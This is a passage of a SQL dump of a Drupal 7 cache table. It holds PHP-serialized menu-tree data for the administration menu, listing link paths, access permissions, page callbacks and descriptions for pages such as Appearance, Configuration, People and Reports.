taxonomy\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:24:\"admin/structure/taxonomy\";s:5:\"title\";s:8:\"Taxonomy\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:67:\"Manage tagging, categorization, and classification of your content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:363;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"363\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:23:\"admin/structure/contact\";s:11:\"router_path\";s:23:\"admin/structure/contact\";s:10:\"link_title\";s:12:\"Contact form\";s:7:\"options\";s:121:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"363\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:21:\"contact_category_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Contact form\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:71:\"Create a system contact form and set up categories for the form to use.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1424617194,1),('links:management:tree-data:en:1748fbf3089600807f4bc7ab9e40005e2ac8c10e1d4c16c14a254c1df02e73fe','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site 